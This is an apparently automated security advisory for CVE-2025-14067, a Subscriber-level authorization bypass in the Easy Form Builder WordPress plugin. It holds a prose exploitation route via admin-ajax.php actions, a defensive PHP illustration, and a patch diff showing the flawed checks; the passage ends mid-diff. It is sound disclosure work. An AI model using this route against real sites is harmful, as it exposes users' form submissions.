Atomic Edge Proof of Concept automated generator using AI diff analysis
Published: March 18, 2026

CVE-2025-14067: Easy Form Builder <= 3.9.3 – Missing Authorization to Authenticated (Subscriber+) Sensitive Form Response Data Exposure (easy-form-builder)

Severity: Medium (CVSS 5.3)
CWE: 862
Vulnerable Version: 3.9.3
Patched Version: 3.9.4
Disclosed: February 12, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-14067:
The Easy Form Builder WordPress plugin version 3.9.3 and earlier contains a missing authorization vulnerability in multiple AJAX endpoints. This flaw allows authenticated users with Subscriber-level permissions or higher to access sensitive form response data, including messages, admin replies, and user information. The vulnerability stems from a logical error in authorization checks across the plugin’s admin AJAX handlers.

Atomic Edge research identified the root cause as an incorrect logical operator in the authorization checks in the class-Emsfb-admin.php file. The plugin combined its two rejection conditions, a failed nonce check and a missing permission, with a logical AND (&&). The vulnerable condition `if (!check_ajax_referer('wp_rest', 'nonce') && !$currrent_user_can)` appears in multiple functions, including `get_responses_efb()`, `get_response_efb()`, `update_response_efb()`, and `delete_response_efb()`. With &&, a request is rejected only when both checks fail, so a caller who satisfies either one (a valid nonce, or the permission) is let through, rather than being required to satisfy both.

The exploitation method involves authenticated attackers with Subscriber access sending AJAX requests to the WordPress admin-ajax.php endpoint. Attackers target specific AJAX actions registered by the plugin, such as 'get_responses_efb', 'get_response_efb', 'update_response_efb', or 'delete_response_efb'. The attacker crafts POST requests with the 'action' parameter set to these vulnerable handlers and includes a valid nonce, or relies on the flawed logic to bypass the authorization check entirely.

The patch in version 3.9.4 corrects the logical operator from AND (&&) to OR (||) and adds proper nonce verification. The fix changes the condition to `if (!check_ajax_referer('wp_rest', 'nonce', false) || !$currrent_user_can)` in all affected functions, so that both a valid nonce AND the required user permission are needed for access. The patch also passes `false` as the third argument to `check_ajax_referer()`, so a failed nonce check returns false instead of terminating the request, and the handler sends its own error response.

Successful exploitation allows attackers to retrieve sensitive form submission data containing user messages, administrative responses, and associated user information. This data exposure violates confidentiality and could lead to privacy breaches. Beyond the access the flawed check grants, the vulnerability does not enable modification or deletion of data, but the exposed information could be leveraged for further attacks or social engineering.
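The following PHP is an added illustration written for this page; it is not the plugin's code and not part of the Atomic Edge advisory. It models the two rejection conditions from the vulnerable and patched versions as pure functions, builds the four-row truth table so the authorization gap is visible at a glance, and shows the two checks combined into one guard the way a hardened handler should call them. The `efb_*` function names are hypothetical; the capability name `manage_options` and the `wp_ajax_<action>` hook names are assumptions (the plugin's real check is `user_permission_efb_admin_dashboard()`, whose capability the advisory does not show). A nonce only proves the request came from the site's own pages; it is not an authorization decision, which is why the capability check must be mandatory.

```php
<?php
declare(strict_types=1);

// Added illustration; the efb_* names are hypothetical and not part of
// the Easy Form Builder plugin.
//
// $nonce_ok is what check_ajax_referer('wp_rest', 'nonce', false) returns,
// $user_can is what the plugin's user_permission_efb_admin_dashboard() returns.
// Each predicate returns true when the request must be REJECTED.

/** The 3.9.3 condition: `!check_ajax_referer(...) && !$currrent_user_can`. */
function efb_reject_3_9_3(bool $nonce_ok, bool $user_can): bool
{
    // Without the third argument, a bad nonce makes check_ajax_referer() die
    // before this expression is evaluated, so only the nonce_ok=true rows are
    // reachable in the real plugin; those rows are where the flaw lives.
    return !$nonce_ok && !$user_can;
}

/** The 3.9.4 condition: `!check_ajax_referer(..., false) || !$currrent_user_can`. */
function efb_reject_3_9_4(bool $nonce_ok, bool $user_can): bool
{
    return !$nonce_ok || !$user_can;
}

/** All four combinations of the two checks, evaluated under both versions. */
function efb_truth_table(): array
{
    $rows = [];
    foreach ([true, false] as $nonce_ok) {
        foreach ([true, false] as $user_can) {
            $rows[] = [
                'nonce_ok'     => $nonce_ok,
                'user_can'     => $user_can,
                'rejected_393' => efb_reject_3_9_3($nonce_ok, $user_can),
                'rejected_394' => efb_reject_3_9_4($nonce_ok, $user_can),
            ];
        }
    }
    return $rows;
}

/** Rows that 3.9.3 lets through but 3.9.4 blocks: the authorization gap. */
function efb_bypass_rows(): array
{
    return array_values(array_filter(
        efb_truth_table(),
        static fn (array $r): bool => !$r['rejected_393'] && $r['rejected_394']
    ));
}

/**
 * The two checks as one guard for a WordPress AJAX handler. Runs only inside
 * WordPress. The capability name is an assumption (see the lead-in).
 */
function efb_require_admin_ajax(string $capability = 'manage_options'): void
{
    // false: return instead of wp_die(), so the handler controls the reply.
    $nonce_ok = check_ajax_referer('wp_rest', 'nonce', false);
    if (!$nonce_ok || !current_user_can($capability)) {
        // A rejection is an error with a 403 status, not a 200 "success" envelope.
        wp_send_json_error(['m' => 'forbidden'], 403);
    }
}

if (function_exists('add_action')) {
    // Inside WordPress (for example as an mu-plugin on a site that cannot update
    // yet): run the guard at priority 0 on each action named in the advisory,
    // before the plugin's own handler. Hook names assume the standard
    // wp_ajax_{action} registration used for admin-ajax.php actions.
    foreach (['get_responses_efb', 'get_response_efb', 'update_response_efb', 'delete_response_efb'] as $action) {
        add_action('wp_ajax_' . $action, static function (): void {
            efb_require_admin_ajax('manage_options');
        }, 0);
    }
} elseif (PHP_SAPI === 'cli') {
    // Stand-alone: print the truth table and count the rows that form the bypass.
    printf("%-9s %-9s %-15s %-15s\n", 'nonce_ok', 'user_can', 'rejected@3.9.3', 'rejected@3.9.4');
    foreach (efb_truth_table() as $r) {
        printf("%-9s %-9s %-15s %-15s\n",
            var_export($r['nonce_ok'], true), var_export($r['user_can'], true),
            var_export($r['rejected_393'], true), var_export($r['rejected_394'], true));
    }
    printf("\nRows 3.9.3 lets through but 3.9.4 blocks: %d\n", count(efb_bypass_rows()));
}
```

Run from the command line the table shows two rows that 3.9.3 accepts and 3.9.4 rejects: a valid nonce without the permission, and the permission without a valid nonce. The first of those is the disclosed bug, because a `wp_rest` nonce is available to any logged-in user, while the second is only reachable once `check_ajax_referer()` is called with `false`. The guard deliberately answers with `wp_send_json_error()` and HTTP 403 rather than the `wp_send_json_success([... 'success' => false ...], 200)` pattern seen in the diff, so that clients and monitoring do not read a denied request as a success.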

Differential between vulnerable and patched code

Code Diff
--- a/easy-form-builder/emsfb.php
+++ b/easy-form-builder/emsfb.php
@@ -3,7 +3,7 @@
  * Plugin Name:         Easy Form Builder
  * Plugin URI:          https://whitestudio.team
  * Description:         Easily create multi-step forms with a unique Confirmation Code feature and notification emails, all without any coding knowledge required, using the easy-to-use drag and drop form wizard of Easy Form Builder. This is the free version and provides an intuitive interface and functionality to create professional forms in minutes. With the unique Confirmation Code feature, you can easily associate each submission with a specific request or user.
- * Version:             3.9.3
+ * Version:             3.9.4
  * Author:              WhiteStudio
  * Author URI:          https://whitestudio.team
  * Text Domain:         easy-form-builder
@@ -28,7 +28,7 @@
 }

 if (!defined("EMSFB_PLUGIN_VERSION")) {
-    define("EMSFB_PLUGIN_VERSION", "3.9.3");
+    define("EMSFB_PLUGIN_VERSION", "3.9.4");
 }


@@ -49,5 +49,4 @@
 $emsfb = new Emsfb();


-/* require_once 'includes/class-Emsfb-requirement.php';
-register_activation_hook(__FILE__, ['CheckRequirementEmsfb', 'run_and_save_efb']); */
+
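Review bot: the deleted commented-out activation hook is replaced by an empty added line (`+`) at the end of the hunk, which only adds trailing whitespace; delete the lines outright. Removing the stale `CheckRequirementEmsfb` reference is consistent with the class being renamed `EmsfbCheckRequirementEmsfb` later in this patch.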
--- a/easy-form-builder/includes/admin/class-Emsfb-admin.php
+++ b/easy-form-builder/includes/admin/class-Emsfb-admin.php
@@ -191,7 +191,7 @@
         $text = ["error403","somethingWentWrongPleaseRefresh"];
         $lang= $efbFunction->text_efb($text);
         $currrent_user_can = $efbFunction->user_permission_efb_admin_dashboard();
-        if (!check_ajax_referer('wp_rest', 'nonce') && !$currrent_user_can) {
+        if (!check_ajax_referer('wp_rest', 'nonce', false) || !$currrent_user_can) {

             $m = $lang["error403"];
             $response = ['success' => false, 'm' =>$m];
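Review bot: the corrected condition `+        if (!check_ajax_referer('wp_rest', 'nonce', false) || !$currrent_user_can) {` now rejects the request unless both checks pass, and the added third argument makes `check_ajax_referer()` return false instead of ending the request, so the handler can send its own reply. The same three lines are repeated verbatim in every handler this patch touches; move them into a single helper next to `user_permission_efb_admin_dashboard()` so a future handler cannot regress to the `&&` form. `$currrent_user_can` (three r's) is misspelled throughout; harmless, but worth a follow-up rename once the security fix has shipped.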
@@ -227,7 +227,7 @@
         $text = ["error403","somethingWentWrongPleaseRefresh"];
         $lang= $efbFunction->text_efb($text);
         $currrent_user_can = $efbFunction->user_permission_efb_admin_dashboard();
-        if (!check_ajax_referer('wp_rest', 'nonce') && !$currrent_user_can) {
+        if (!check_ajax_referer('wp_rest', 'nonce', false) || !$currrent_user_can) {

             $m = $lang["error403"];
             $response = ['success' => false, 'm' =>$m];
@@ -259,7 +259,7 @@
         $text = ["sms_noti","msg_adons","error403","invalidRequire","nAllowedUseHtml","updated","upDMsg" ,"newMessageReceived","trackNo","url","newResponse","WeRecivedUrM"];
         $lang= $efbFunction->text_efb($text);
         $currrent_user_can = $efbFunction->user_permission_efb_admin_dashboard();
-        if (!check_ajax_referer('wp_rest', 'nonce') && !$currrent_user_can) {
+        if (!check_ajax_referer('wp_rest', 'nonce', false) || !$currrent_user_can) {

             $m = $lang["error403"];
             $response = ['success' => false, 'm' => $m];
@@ -341,7 +341,12 @@
                 $response = ['success' => false, 'm' => $m];
                 wp_send_json_success($response, 200);
             }
-
+            $pth = EMSFB_PLUGIN_DIRECTORY . '/vendor/smssended/smsefb.php';
+            if(!file_exists($pth)) {
+                $m = str_replace('NN', '<b>' . $lang['sms_noti'] . '</b>', $lang['msg_adons']);
+                $response = ['success' => false, 'm' => $m];
+                wp_send_json_success($response, 200);
+            }
 			require_once( EMSFB_PLUGIN_DIRECTORY . '/vendor/smssended/smsefb.php' );
 			$smsefb = new smssendefb();

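Review bot: the new `file_exists()` guard reports a missing add-on with `wp_send_json_success($response, 200)` while the payload carries `'success' => false`; an absent file is an error condition and should go through `wp_send_json_error()` with a non-200 status so clients and monitoring do not count it as a success. The guard itself is sound: `wp_send_json_success()` terminates the request, so the `require_once` on the next line is only reached when the file exists.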
@@ -393,7 +398,7 @@

         $dd =gettype(array_search($post_value, $allw));
         $currrent_user_can = $efbFunction->user_permission_efb_admin_dashboard();
-        if (check_ajax_referer('wp_rest', 'nonce') != 1 || $dd!="integer" && !$currrent_user_can) {
+        if (!check_ajax_referer('wp_rest', 'nonce', false) || !$currrent_user_can || $dd!="integer") {

             $m = $lang["error403"];
             $response = ['success' => false, 'm' => $m];
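Review bot: the old condition `check_ajax_referer('wp_rest', 'nonce') != 1 || $dd!="integer" && !$currrent_user_can` had a precedence problem (`&&` binds tighter than `||`), so an allowed `$post_value` let a caller without the capability through; the flattened `||` chain in the new line fixes that. The `$dd = gettype(array_search($post_value, $allw))` allow-list test is fragile because `array_search()` compares loosely; `in_array($post_value, $allw, true)` states the same check directly and strictly.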
@@ -540,7 +545,7 @@
         $lang= $efbFunction->text_efb($text);
         $ac= $efbFunction->get_setting_Emsfb();
         $currrent_user_can = $efbFunction->user_permission_efb_admin_dashboard();
-        if (check_ajax_referer('wp_rest', 'nonce') != 1 && !$currrent_user_can) {
+        if (!check_ajax_referer('wp_rest', 'nonce', false) || !$currrent_user_can) {

             $m = $lang["error403"];
             $response = ['success' => false, 'm' => $m];
@@ -631,7 +636,7 @@
         $text = ["error403","somethingWentWrongPleaseRefresh","updated"];
         $lang= $efbFunction->text_efb($text);
         $currrent_user_can = $efbFunction->user_permission_efb_admin_dashboard();
-        if (!check_ajax_referer('wp_rest', 'nonce') && !$currrent_user_can) {
+        if (!check_ajax_referer('wp_rest', 'nonce', false) || !$currrent_user_can) {
             $m =   $lang["error403"];
             $response = ['success' => false, 'm' => $m];
             wp_send_json_success($response, 200);
@@ -661,7 +666,7 @@
         $text = ["error403","somethingWentWrongPleaseRefresh"];
         $lang= $efbFunction->text_efb($text);
         $currrent_user_can = $efbFunction->user_permission_efb_admin_dashboard();
-        if (!check_ajax_referer('wp_rest', 'nonce') && !$currrent_user_can) {
+        if (!check_ajax_referer('wp_rest', 'nonce', false) || !$currrent_user_can) {

             $m =   $lang["error403"];
             $response = ['success' => false, 'm' => $m];
@@ -712,7 +717,7 @@
         $lang= $efbFunction->text_efb($text);
         $currrent_user_can = $efbFunction->user_permission_efb_admin_dashboard();

-        if (!check_ajax_referer('wp_rest', 'nonce') && !$currrent_user_can) {
+        if (!check_ajax_referer('wp_rest', 'nonce', false) || !$currrent_user_can) {
             $m =   $lang["error403"];
             $response = ['success' => false, 'm' => $m];
             wp_send_json_success($response, 200);
@@ -742,7 +747,7 @@
         $text = ["spprt","error403","somethingWentWrongPleaseRefresh" ,"guest"];
         $lang= $efbFunction->text_efb($text);
         $currrent_user_can = $efbFunction->user_permission_efb_admin_dashboard();
-        if (!check_ajax_referer('wp_rest', 'nonce') && !$currrent_user_can) {
+        if (!check_ajax_referer('wp_rest', 'nonce', false) || !$currrent_user_can) {

             $m =   $lang["error403"];
             $response = ['success' => false, 'm' => $m];
@@ -785,7 +790,7 @@
         $lang= $this->efbFunction->text_efb($text);
         $currrent_user_can = $this->efbFunction->user_permission_efb_admin_dashboard();

-        if (!check_ajax_referer('wp_rest', 'nonce') && !$currrent_user_can) {
+        if (!check_ajax_referer('wp_rest', 'nonce', false) || !$currrent_user_can) {
             $response = ['success' => false, 'm' => $lang["error403"]];
             wp_send_json_success($response, 200);
             die("secure!");
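Review bot: `die("secure!")` after `wp_send_json_success()` is never reached in the AJAX path, since `wp_send_json_success()` already ends the request; drop it, or if it is kept as belt-and-braces use `wp_die()` so the shutdown hooks still run.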
@@ -905,7 +910,7 @@
         $lang= $efbFunction->text_efb($text);
         $currrent_user_can = $efbFunction->user_permission_efb_admin_dashboard();

-        if (!check_ajax_referer('wp_rest', 'nonce') && !$currrent_user_can) {
+        if (!check_ajax_referer('wp_rest', 'nonce', false) || !$currrent_user_can) {
             $m = $lang["error403"];
             $response = ['success' => false, 'm' => $m];
             wp_send_json_success($response, 200);
@@ -929,7 +934,6 @@
         }

         $m = json_decode($post_message, true);
-
         $setting = $post_message;
         $table_name = $this->db->prefix . "emsfb_setting";
         $email="";
@@ -1050,7 +1054,7 @@
         $text = ["cCodeNFound","error403"];
         $lang= $efbFunction->text_efb($text);
         $currrent_user_can = $efbFunction->user_permission_efb_admin_dashboard();
-        if (!check_ajax_referer('wp_rest', 'nonce') && !$currrent_user_can) {
+        if (!check_ajax_referer('wp_rest', 'nonce', false) || !$currrent_user_can) {

             $m = $lang["error403"];
             $response = ['success' => false, 'm' =>$m];
@@ -1085,7 +1089,7 @@
         $text = ["fileDeleted","error403"];
         $lang= $efbFunction->text_efb($text);
         $currrent_user_can = $efbFunction->user_permission_efb_admin_dashboard();
-        if (!check_ajax_referer('wp_rest', 'nonce') && !$currrent_user_can) {
+        if (!check_ajax_referer('wp_rest', 'nonce', false) || !$currrent_user_can) {

             $m = $lang["error403"];
             $response = ['success' => false, 'm' =>$m];
@@ -1147,7 +1151,7 @@
         $lang= $efbFunction->text_efb($text);
         $m = $lang["error403"];
         $currrent_user_can = $efbFunction->user_permission_efb_admin_dashboard();
-        if (!check_ajax_referer('wp_rest', 'nonce') && !$currrent_user_can) {
+        if (!check_ajax_referer('wp_rest', 'nonce', false) || !$currrent_user_can) {
             $response = ['success' => false, 'm' => $m];
             wp_send_json_success($response, 200);
             die("secure!");
@@ -1254,7 +1258,12 @@
             if(is_wp_error($r)){

             }else{
-                require_once(ABSPATH . 'wp-admin/includes/file.php');
+                $path = ABSPATH . 'wp-admin/includes/file.php';
+                if ( ! file_exists( $path ) ) {
+                    return false;
+                }
+
+                require_once($path );
                 if (WP_Filesystem()) {
                     global $wp_filesystem;

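Review bot: the `if(is_wp_error($r)){ }` branch directly above the changed lines is empty, so a failed download is silently ignored and execution continues into the filesystem code; the next hunk handles the same case with `return false;`, do the same here. The new `file_exists()` check on `wp-admin/includes/file.php` guards a core file that is present on any working install, so the `return false` it introduces is effectively unreachable; harmless, but it should not be mistaken for error handling of the download.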
@@ -1276,8 +1285,12 @@
                 if(is_wp_error($r)){
                     return false;
                 }else{
+                $path = ABSPATH . 'wp-admin/includes/file.php';
+                if ( ! file_exists( $path ) ) {
+                    return false;
+                }

-                    require_once(ABSPATH . 'wp-admin/includes/file.php');
+                require_once($path );
                     WP_Filesystem();
                     $r = unzip_file(EMSFB_PLUGIN_DIRECTORY . '/temp/temp.zip', EMSFB_PLUGIN_DIRECTORY . '/vendor/');
                     if(is_wp_error($r)){
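Review bot: the added `$path` / `if ( ! file_exists( $path ) )` lines are indented one level shallower than the `}else{` block they live in, and `require_once($path );` has a stray space before the closing parenthesis; align them with the surrounding `WP_Filesystem();` line so the structure of the else branch is readable.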
@@ -1391,7 +1404,6 @@


              }
-             require_once(EMSFB_PLUGIN_DIRECTORY."/includes/integrate-wpb.php");

              if (function_exists('register_block_type')) {

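Review bot: `require_once(EMSFB_PLUGIN_DIRECTORY."/includes/integrate-wpb.php")` is removed with no replacement in this hunk. If the WPBakery integration is now loaded from elsewhere, say so in the commit message; otherwise this silently drops a feature as part of a security release.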
@@ -1404,7 +1416,7 @@

         $efbFunction = $this->get_efbFunction(1);
         $currrent_user_can = $efbFunction->user_permission_efb_admin_dashboard();
-       if(check_ajax_referer('wp_rest', 'nonce') != 1 && !$currrent_user_can) {
+       if(!check_ajax_referer('wp_rest', 'nonce', false) || !$currrent_user_can) {

             $response = ['success' => false, 'm' =>'Security Error'];
             wp_send_json_success($response, 200);
@@ -1429,7 +1441,7 @@
         $text = ["error403","somethingWentWrongPleaseRefresh","copy"];
         $lang= $efbFunction->text_efb($text);
         $currrent_user_can = $efbFunction->user_permission_efb_admin_dashboard();
-        if (!check_ajax_referer('wp_rest', 'nonce') && !$currrent_user_can) {
+        if (!check_ajax_referer('wp_rest', 'nonce', false) || !$currrent_user_can) {

             $response = ['success' => false, 'm' =>$lang["error403"]];
             wp_send_json_success($response, 200);
@@ -1488,7 +1500,7 @@
         $lang= $efbFunction->text_efb($text);
         $currrent_user_can = $efbFunction->user_permission_efb_admin_dashboard();

-        if (!check_ajax_referer('wp_rest', 'nonce') && !$currrent_user_can) {
+        if (!check_ajax_referer('wp_rest', 'nonce', false) || !$currrent_user_can) {

             $response = ['success' => false, 'm' =>$lang["error403"]];
             wp_send_json_success($response, 200);
@@ -1537,7 +1549,7 @@
         $lang= $efbFunction->text_efb($text);
         $currrent_user_can = $efbFunction->user_permission_efb_admin_dashboard();

-        if (!check_ajax_referer('wp_rest', 'nonce') && !$currrent_user_can) {
+        if (!check_ajax_referer('wp_rest', 'nonce', false) || !$currrent_user_can) {

             $response = ['success' => false, 'm' =>$lang["error403"]];
             wp_send_json_success($response, 200);
@@ -1604,7 +1616,7 @@
         $efbFunction = $this->get_efbFunction(1);
         $currrent_user_can = $efbFunction->user_permission_efb_admin_dashboard();

-        if (check_ajax_referer('wp_rest', 'nonce') != 1 && !$currrent_user_can) {
+        if (!check_ajax_referer('wp_rest', 'nonce', false) || !$currrent_user_can) {

             $response = ['success' => false, 'm' =>'Security Error'];
             wp_send_json_success($response, 200);
@@ -1618,7 +1630,7 @@
         $efbFunction = $this->get_efbFunction(1);
         $currrent_user_can = $efbFunction->user_permission_efb_admin_dashboard();

-        if (check_ajax_referer('wp_rest', 'nonce') != 1 && !$currrent_user_can) {
+        if (!check_ajax_referer('wp_rest', 'nonce', false) || !$currrent_user_can) {

             $response = ['success' => false, 'm' =>'Security Error'];
             wp_send_json_success($response, 200);
@@ -1678,8 +1690,15 @@
                        update_option('emsfb_email_status', result_ok('ok_set_smtp'));
                        return;
                 }else{
-                    require_once (EMSFB_PLUGIN_DIRECTORY . 'includes/class-Emsfb-requirement.php');
-                    $efbRequirement = new CheckRequirementEmsfb();
+                    $path = EMSFB_PLUGIN_DIRECTORY . 'includes/class-Emsfb-requirement.php';
+                    if (!file_exists($path)) {
+                        return;
+                    }
+                    require_once ($path);
+                    if (!class_exists('EmsfbCheckRequirementEmsfb')) {
+                        return;
+                    }
+                    $efbRequirement = new EmsfbCheckRequirementEmsfb();
                     $efbRequirement->run_and_save_efb();
                     $check = get_option('emsfb_email_status', false);
                     if(is_array($check)  && isset($check['status']) && ($check['status'] == 'ok_set_smtp' || $check['status'] == 'ok')) {
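Review bot: `$path = EMSFB_PLUGIN_DIRECTORY . 'includes/class-Emsfb-requirement.php';` has no `/` between the constant and the relative path, whereas the other hunks in this file use `EMSFB_PLUGIN_DIRECTORY . '/vendor/...'` and `EMSFB_PLUGIN_DIRECTORY."/includes/..."`. If the constant has no trailing slash the path is wrong, and the new `file_exists()` guard turns that into a silent `return`, so the requirement check never runs and nothing reports it. Confirm which form the constant expects and use it consistently. The `class_exists('EmsfbCheckRequirementEmsfb')` guard is a good addition; make sure the renamed class really lives in that file.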
--- a/easy-form-builder/includes/class-Emsfb-public.php
+++ b/easy-form-builder/includes/class-Emsfb-public.php
@@ -6,7 +6,7 @@
  * Class _Public
  * @package Emsfb
  */
-require_once('functions.php');
+require_once(__DIR__ . '/functions.php');

 class _Public {
 	public $value;
@@ -377,7 +377,7 @@
 			window.elementorFrontendConfig = window.elementorFrontendConfig || {};
 			window.elementorFrontendConfig.tools = window.elementorFrontendConfig.tools || {};
 			window.elementorFrontendConfig.settings = window.elementorFrontendConfig.settings || {};
-			console.log('EFB: Elementor detected - config protection applied');
+
 			</script>
 			<?php
 		}
@@ -421,7 +421,7 @@
 					attempts++;

 					if (window.elementorFrontend && typeof window.elementorFrontend === 'object') {
-						console.log('🚀 EFB: Found elementorFrontend, patching methods...');
+


 						Object.defineProperty(window.elementorFrontend, 'config', {
@@ -445,9 +445,9 @@
 							window.elementorFrontend.initOnReadyComponents = function() {
 								try {

-									console.log('🔍 EFB: this.config before fix:', this.config);
-									console.log('🔍 EFB: this.config.tools before fix:', this.config ? this.config.tools : 'config is null');
-									console.log('🔍 EFB: window.elementorFrontendConfig:', window.elementorFrontendConfig);
+
+
+


 									this.config = window.elementorFrontendConfig || safeConfig;
@@ -456,9 +456,9 @@
 									this.config.tools = safeConfig.tools;
 									this.config.settings = safeConfig.settings;

-									console.log('🔧 EFB: FORCED tools and settings');
-									console.log('🔍 EFB: this.config.tools AFTER fix:', this.config.tools);
-									console.log('🛡️ EFB: Safe initOnReadyComponents called, config fixed:', this.config);
+
+
+


 									try {
@@ -503,7 +503,7 @@

 					if (attempts > 500) {
 						clearInterval(checkElementor);
-						console.log('⚠️ EFB: elementorFrontend not found, using global protection only');
+
 					}
 				}, 10);
 				console.log('� EFB: Ultimate Elementor fix started');
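Review bot: `console.log('� EFB: Ultimate Elementor fix started');` survives in the unchanged context line right after the removed logging, so the debug output is only partly removed; remove it as well. Across this and the preceding hunks in the file, each removed `console.log` is replaced by a blank `+` line, leaving runs of empty lines inside the script; delete the lines rather than blanking them.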
@@ -1133,7 +1133,7 @@


 		/* if ($s_sid !=1){
-			error_log('Invalid SID: ' . $sid);
+
 			$m =  $this->lanText["somethingWentWrongPleaseRefresh"]. '<br>'. esc_html__('Error Code','easy-form-builder') .': 403';
 			$response = array( 'success' => false  , 'm'=>$m);
 			wp_send_json_success($response,200);
@@ -3202,11 +3202,6 @@
 		$this->id =sanitize_text_field( wp_unslash($data_POST['id']));
 		$sid = '';

-	/* 	if ($s_sid !=1){
-			$m = esc_html__('error', 'easy-form-builder') . ' 403';
-			$response = array( 'success' => false  , 'm'=>$m);
-			wp_send_json_success($response,200);
-		} */
 		$r= $this->setting!=NULL  && empty($this->setting)!=true ? $this->setting:  $this->get_setting_Emsfb('setting');
 		$Sk ='null';
 		if(gettype($r)=="string"){
@@ -3412,12 +3407,7 @@

 		$text_=['somethingWentWrongPleaseRefresh'];
 		$this->lanText= $this->efbFunction->text_efb($text_);
-		/* if ($s_sid !=1){

-			$m =  $this->lanText["somethingWentWrongPleaseRefresh"]. '<br>'. esc_html__('Error Code','easy-form-builder') .': 403';
-		$response = array( 'success' => false  , 'm'=>$m);
-		wp_send_json_success($response,200);
-		} */
 		$Sk ='null';
 		if(gettype($r)=="string"){
 			$setting =str_replace('\', '', $r);
--- a/easy-form-builder/includes/class-Emsfb.php
+++ b/easy-form-builder/includes/class-Emsfb.php
@@ -39,8 +39,11 @@
         );


+        add_action('upgrader_process_complete', [$this, 'plugin_update_completed_efb'], 10, 2);


+        add_action('plugins_loaded', [$this, 'check_version_and_upgrade_efb']);
+
     }


@@ -102,26 +105,59 @@
         }
     }

-    public static  function email_send_efb(){
-		$message=esc_html__('The Easy Form Builder had Important update and require to deactivate and activate the plugin manually </br> Notice:Please do this act in immediately so forms of your site will available again.','easy-form-builder');
-		$usr=get_userdata(1);
-
-		$users = get_super_admins();
-		foreach ($users as $key => $value) {
-			$user =get_user_by('login',$value);
-			$to = $usr ->data->user_email;
-            $SERVER_NAME = isset($_SERVER['SERVER_NAME']) ? sanitize_text_field( wp_unslash( $_SERVER['SERVER_NAME'] ) ) : 'yourdomain.com';
-			$from =get_bloginfo('name')." <no-reply@".$SERVER_NAME.">";
-			$headers = array(
-				'MIME-Version: 1.0rn',
-				'"Content-Type: text/html; charset=ISO-8859-1rn"',
-			'From:'.$from.''
-			);
-		$subject = "Important Warning form ".get_bloginfo('name');
-		$to = wp_mail($to, $subject, wp_kses_post($message), $headers);
-		}
+ /**
+     * Send email notification to all super admins about database changes
+     *
+     * @since 3.9.4
+     * @return void
+     */
+    public static function email_send_efb() {
+        $message = esc_html__( 'The Easy Form Builder had Important update and require to deactivate and activate the plugin manually </br> Notice: Please do this act immediately so forms of your site will be available again.', 'easy-form-builder' );
+
+
+        $super_admins = get_super_admins();
+
+        if ( empty( $super_admins ) ) {
+            return;
+        }
+
+
+        $recipients = array();
+
+        foreach ( $super_admins as $admin_login ) {
+            $user = get_user_by( 'login', $admin_login );
+
+            if ( $user && is_email( $user->user_email ) ) {
+                $recipients[] = sanitize_email( $user->user_email );
+            }
+        }
+
+
+        if ( empty( $recipients ) ) {
+            return;
+        }
+
+
+        $server_name = isset( $_SERVER['SERVER_NAME'] ) ? sanitize_text_field( wp_unslash( $_SERVER['SERVER_NAME'] ) ) : 'yourdomain.com';
+        $from_email  = 'no-reply@' . $server_name;
+        $from_name   = get_bloginfo( 'name' );
+
+        $headers = array(
+            'Content-Type: text/html; charset=UTF-8',
+            sprintf( 'From: %s <%s>', $from_name, $from_email ),
+        );
+
+
+        $subject = sprintf(
+
+            esc_html__( 'Important Warning from %s', 'easy-form-builder' ),
+            get_bloginfo( 'name' )
+        );

-	}
+
+
+        wp_mail( $recipients, $subject, wp_kses_post( $message ), $headers );
+    }

     /**
      * Initialize Elementor compatibility for all EFB admin pages
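Review bot: `esc_html__()` on a message that contains `</br>` (the `$message = esc_html__( 'The Easy Form Builder had Important update ... </br> Notice: ...' )` line) HTML-escapes the tag, so the HTML e-mail shows a literal `&lt;/br&gt;`; either drop the markup or use `__()` and rely on the `wp_kses_post()` already applied at send time, and `</br>` should be `<br>` in any case. Passing `$recipients` as an array to `wp_mail()` puts every super admin in one `To:` header, which discloses the admin list to each recipient; send one message per address or use Bcc. The rewrite does fix the old loop, which looked up `$user` but always mailed `get_userdata(1)`. The doc-block opener ` /**` is indented one space less than the method it documents.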
@@ -147,6 +183,7 @@
      * Apply Elementor admin compatibility fixes to prevent conflicts
      */
     public function apply_elementor_admin_fixes_efb() {
+
         add_action('admin_footer', array($this, 'elementor_admin_conflict_prevention_efb'));
     }

@@ -174,25 +211,32 @@
         $current_page = isset($_GET['page']) ? sanitize_key( $_GET['page'] ) : '';
         ?>
         <script type="text/javascript">
+
         (function($) {
             'use strict';

+
             if (typeof window.efb_global_elementor_protection === 'undefined') {
                 window.efb_global_elementor_protection = true;

-                // Fix Elementor tools undefined error
+                 ?>');
+
+
                 if (typeof elementorFrontend !== 'undefined') {
                     try {
+
                         if (!elementorFrontend.tools) {
                             elementorFrontend.tools = {};
+
                         }
                     } catch (e) {
-                        // Silently handle error
+
                     }
                 }

+
                 $(document).ready(function() {
-                    // Suppress Elementor-related errors
+
                     $(window).on('error', function(e) {
                         if (e.originalEvent && e.originalEvent.message) {
                             var errorMessage = e.originalEvent.message.toLowerCase();
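Review bot: `+                 ?>');` replaces the comment `// Fix Elementor tools undefined error` inside the inline `<script>` block. PHP mode was already closed by the `?>` two lines above `<script>`, so as shown this line is emitted verbatim into the JavaScript and turns the whole IIFE into a syntax error, which would disable the Elementor compatibility code on every admin page. This looks like a mangled edit; the hunk should only remove the comment.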
@@ -200,9 +244,8 @@
                                 errorMessage.includes('elementor') ||
                                 errorMessage.includes('tools') ||
                                 errorMessage.includes('cannot read properties of undefined')) {
-
                                 if (window.console && window.console.log && typeof window.efb_debug !== 'undefined' && window.efb_debug) {
-                                    console.log('EFB: Suppressed Elementor error:', errorMessage);
+
                                 }
                                 e.preventDefault();
                                 return false;
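Review bot: removing the `console.log` leaves an empty `if (window.console && window.console.log && typeof window.efb_debug !== 'undefined' && window.efb_debug) { }` body; remove the guard together with the log statement (the `@@ -218` hunk below has the same leftover).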
@@ -210,7 +253,7 @@
                         }
                     });

-                    // Fix dispatchEvent errors - use EventTarget instead of Event
+
                     if (window.EventTarget && window.EventTarget.prototype && EventTarget.prototype.dispatchEvent) {
                         var originalDispatchEvent = EventTarget.prototype.dispatchEvent;
                         EventTarget.prototype.dispatchEvent = function(event) {
@@ -218,7 +261,7 @@
                                 return originalDispatchEvent.call(this, event);
                             } catch (e) {
                                 if (window.console && typeof window.efb_debug !== 'undefined' && window.efb_debug) {
-                                    console.log('EFB: dispatchEvent error caught:', e.message);
+
                                 }
                                 return false;
                             }
@@ -231,4 +274,85 @@
         <?php
     }

+    /**
+     * Check version and run upgrade tasks if needed
+     *
+     * @since 3.9.4
+     * @return void
+     */
+    public function check_version_and_upgrade_efb() {
